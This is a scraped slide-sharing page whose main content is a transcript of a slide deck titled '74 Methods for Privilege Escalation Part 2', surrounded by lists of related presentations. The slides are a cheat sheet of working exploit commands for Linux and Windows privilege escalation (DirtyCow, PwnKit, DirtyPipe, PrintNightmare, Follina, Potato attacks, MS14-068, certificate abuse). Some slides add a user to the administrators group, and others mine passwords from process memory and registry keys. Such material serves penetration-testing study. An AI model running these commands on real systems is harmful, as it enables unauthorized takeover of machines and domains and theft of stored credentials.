Where is my MQ message on z/OS?Where is my MQ message on z/OS?
Where is my MQ message on z/OS?
Matt Leming
 
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best PracticesDomino Tech School - Upgrading to Notes/Domino V10: Best Practices
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices
Christoph Adler
 
Fixing Domino Server Sickness
Fixing Domino Server SicknessFixing Domino Server Sickness
Fixing Domino Server Sickness
Gabriella Davis
 
Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012
Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012
Deep Dive AdminP Process - Admin and Infrastructure Track at UKLUG 2012
BCC - Solutions for IBM Collaboration Software
 
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2
jayeshpar2006
 
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-ServerBewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
panagenda
 
User Management - Brief Overview
User Management - Brief OverviewUser Management - Brief Overview
User Management - Brief Overview
sgillihan
 
IBM Lotus Domino Domain Monitoring (DDM)
IBM Lotus Domino Domain Monitoring (DDM)IBM Lotus Domino Domain Monitoring (DDM)
IBM Lotus Domino Domain Monitoring (DDM)
Austin Chang
 
What is new in Notes & Domino Deleopment V10.x
What is new in Notes & Domino Deleopment V10.xWhat is new in Notes & Domino Deleopment V10.x
What is new in Notes & Domino Deleopment V10.x
Ulrich Krause
 
CNIT 40: 2: DNS Protocol and Architecture
CNIT 40: 2: DNS Protocol and ArchitectureCNIT 40: 2: DNS Protocol and Architecture
CNIT 40: 2: DNS Protocol and Architecture
Sam Bowne
 
How to Bring HCL Nomad Web and Domino Together Without SafeLinx
How to Bring HCL Nomad Web and Domino Together Without SafeLinxHow to Bring HCL Nomad Web and Domino Together Without SafeLinx
How to Bring HCL Nomad Web and Domino Together Without SafeLinx
panagenda
 
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesApril, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
Howard Greenberg
 
40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
Hadess
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdf
rimaNova1
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
OlehLevytskyi1
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
Apcera
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
webuploader
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
nayakslideshare
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
Adeel Javaid
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Mauricio Velazco
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
n|u - The Open Security Community
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium Sandbox
Patricia Aas
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
nullthreat
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm44
 

More Related Content

What's hot

Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-ServerBewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
panagenda
 
User Management - Brief Overview
User Management - Brief OverviewUser Management - Brief Overview
User Management - Brief Overview
sgillihan
 
IBM Lotus Domino Domain Monitoring (DDM)
IBM Lotus Domino Domain Monitoring (DDM)IBM Lotus Domino Domain Monitoring (DDM)
IBM Lotus Domino Domain Monitoring (DDM)
Austin Chang
 
What is new in Notes & Domino Deleopment V10.x
What is new in Notes & Domino Deleopment V10.xWhat is new in Notes & Domino Deleopment V10.x
What is new in Notes & Domino Deleopment V10.x
Ulrich Krause
 
CNIT 40: 2: DNS Protocol and Architecture
CNIT 40: 2: DNS Protocol and ArchitectureCNIT 40: 2: DNS Protocol and Architecture
CNIT 40: 2: DNS Protocol and Architecture
Sam Bowne
 
How to Bring HCL Nomad Web and Domino Together Without SafeLinx
How to Bring HCL Nomad Web and Domino Together Without SafeLinxHow to Bring HCL Nomad Web and Domino Together Without SafeLinx
How to Bring HCL Nomad Web and Domino Together Without SafeLinx
panagenda
 
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesApril, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
Howard Greenberg
 

What's hot (7)

Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-ServerBewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
Bewährte Praktiken für HCL Notes/Domino-Sicherheit. Teil 2: Der Domino-Server
 
User Management - Brief Overview
User Management - Brief OverviewUser Management - Brief Overview
User Management - Brief Overview
 
IBM Lotus Domino Domain Monitoring (DDM)
IBM Lotus Domino Domain Monitoring (DDM)IBM Lotus Domino Domain Monitoring (DDM)
IBM Lotus Domino Domain Monitoring (DDM)
 
What is new in Notes & Domino Deleopment V10.x
What is new in Notes & Domino Deleopment V10.xWhat is new in Notes & Domino Deleopment V10.x
What is new in Notes & Domino Deleopment V10.x
 
CNIT 40: 2: DNS Protocol and Architecture
CNIT 40: 2: DNS Protocol and ArchitectureCNIT 40: 2: DNS Protocol and Architecture
CNIT 40: 2: DNS Protocol and Architecture
 
How to Bring HCL Nomad Web and Domino Together Without SafeLinx
How to Bring HCL Nomad Web and Domino Together Without SafeLinxHow to Bring HCL Nomad Web and Domino Together Without SafeLinx
How to Bring HCL Nomad Web and Domino Together Without SafeLinx
 
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesApril, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
 

Similar to 74 Methods for Privilege Escalation Part 2

40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
Hadess
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdf
rimaNova1
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
OlehLevytskyi1
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
Apcera
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
webuploader
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
nayakslideshare
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
Adeel Javaid
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Mauricio Velazco
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
n|u - The Open Security Community
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium Sandbox
Patricia Aas
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
nullthreat
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm44
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
henelpj
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Mauricio Velazco
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
 

Similar to 74 Methods for Privilege Escalation Part 2 (20)

40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdf
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
 
Debugging Network Issues
Debugging Network IssuesDebugging Network Issues
Debugging Network Issues
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
 
How hackers attack networks
How hackers attack networksHow hackers attack networks
How hackers attack networks
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium Sandbox
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 

Recently uploaded

dbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdfdbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
Shinana2
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
LucaBarbaro3
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
fredae14
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
Hiike
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfNunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
flufftailshop
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
alexjohnson7307
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
GDSC PJATK
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
Intelisync
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
Dinusha Kumarasiri
 

Recently uploaded (20)

dbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdfdbms calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfNunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
 

74 Methods for Privilege Escalation Part 2

  • 1. 74 METHODS FOR PRIVILEGE ESCALATION PART 2 HADESS | SECURE AGILE DEVELOPMENT WWW.HADESS.IO
  • 2. NO Y/N Yes NO NO NO Y/N Y/N N N N YES YES YES Y/N YES YES YES NO NO Y/N NO Y/N YES No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 1 Abusing Sudo Binaries 2 Abusing Scheduled Tasks 3 Golden Ticket With Scheduled Tasks 4 Abusing Interpreter Capabilities 5 Abusing Binary Capabilities 6 Abusing ActiveSessions Capabilities 7 Escalate with TRUSTWORTHY in SQL Server 8 Abusing Mysql run as root No Method DOMAIN APT 9 Abusing journalctl 10 Abusing VDS 11 Abusing Browser 12 Abusing LDAP 13 LLMNR Poisoning 14 Abusing Certificate Services 15 MySQL UDF Code Injection 16 Impersonation Token with ImpersonateLoggedOnuser No Method DOMAIN APT 17 Impersonation Token with SeImpersontePrivilege 18 Impersonation Token with SeLoadDriverPrivilege 19 OpenVPN Credentials 20 Bash History 21 Package Capture 22 NFS Root Squashing 23 Abusing Access Control List 24 Escalate With SeBackupPrivilege
  • 3. No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 25 Escalate With SeImpersonatePrivilege YES 26 Escalate With SeLoadDriverPrivilege YES 27 Escalate With ForceChangePassword YES 28 Escalate With GenericWrite YES 29 Abusing GPO YES 30 Pass-the-Ticket YES 31 Golden Ticket YES 32 Abusing Splunk Universal Forwarder NO No Method DOMAIN APT 33 Abusing Gdbus Y/N 34 Abusing Trusted DC YES 35 NTLM Relay YES 36 Exchange Relay YES 37 Dumping with diskshadow YES 38 Dumping with vssadmin YES 39 Password Spraying Y/N 40 AS-REP Roasting YES
  • 5. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit gcc -pthread c0w.c -o c0w; ./c0w; passwd; id DIRTYC0W HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 6. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit CVE-2016-1531.sh;id CVE-2016-1531 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 7. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege- Esclation poc.sh POLKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 8. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./traitor-amd64 --exploit kernel:CVE-2022-0847 Whoami;id DIRTYPIPE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 9. Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./cve-2021-4034 Whoami;id PWNKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 10. Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit msf > use exploit/windows/local/ms14_058_track_popup_menu msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id > msf exploit(ms14_058_track_popup_menu) > exploit MS14_058 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 11. Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit In command prompt type: powershell.exe -nop -ep bypass In Power Shell prompt type: Import-Module C:UsersUserDesktopToolsTaterTater.ps1 In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add" To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators HOT POTATO HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 12. Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit execute -H -f sysret.exe -a "-pid [pid]” INTEL SYSRET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 13. Domain: Yes Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/outflanknl/PrintNightmare PrintNightmare 10.10.10.10 exp.dll PRINTNIGHTMARE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 14. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/JohnHammond/msdt-follina python3 follina.py -c "notepad" FOLINA HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 15. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/riparino/Task_Scheduler_ALPC ALPC HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 16. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user .RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1 REMOTEPOTATO0 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 17. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show CVE-2022-26923 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 18. Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841- 771695929-1514560438-1103 -d dc-a-2003.dom-a.loc MS14-068 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 19. Domain: No Local Admin: Yes OS: Linux Type: Enumeration & Hunt ps -ef | grep ftp; gdp -p ftp_id info proc mappings q dump memory /tmp/mem [start] [end] q strings /tmp/mem | grep passw PASSWORD MINING IN MEMORY(LINUX) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 20. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d 1 2. 3. PASSWORD MINING IN MEMORY(WINDOWS) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
  • 21. Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Open command and type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultUsername In command prompt type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultPassword Notice the credentials, from the output. In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyUsername In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyPassword In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v Password In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v PasswordViewOnly Make note of the encrypted passwords and type: C:UsersUserDesktopToolsvncpwdvncpwd.exe [Encrypted Password] From the output, make note of the credentials. 1. 2. 3. 4. 5. 6. Notice the credentials, from the output. 7. 8. 9. 10. PASSWORD MINING IN REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT 